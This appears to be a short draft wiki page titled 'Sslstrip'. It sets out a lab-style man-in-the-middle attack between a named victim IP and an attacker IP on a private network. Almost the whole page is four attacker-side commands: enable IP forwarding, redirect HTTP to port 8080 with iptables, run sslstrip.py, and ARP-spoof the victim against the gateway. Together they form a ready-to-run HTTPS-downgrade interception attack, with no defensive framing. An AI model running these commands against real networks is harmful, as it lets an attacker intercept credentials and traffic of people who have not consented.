Sslstrip
Jump to navigation
Jump to search
DRAFT
This page is still a draft. Thank you for your understanding.
- Victim 192.168.100.42
- Attacker 192.168.100.45
From the attacker's machine:
# echo "1" > /proc/sys/net/ipv4/ip_forward # iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 # python sslstrip.py -s -l 8080 # arpspoof -i wlan0 -t 192.168.100.42 192.168.100.1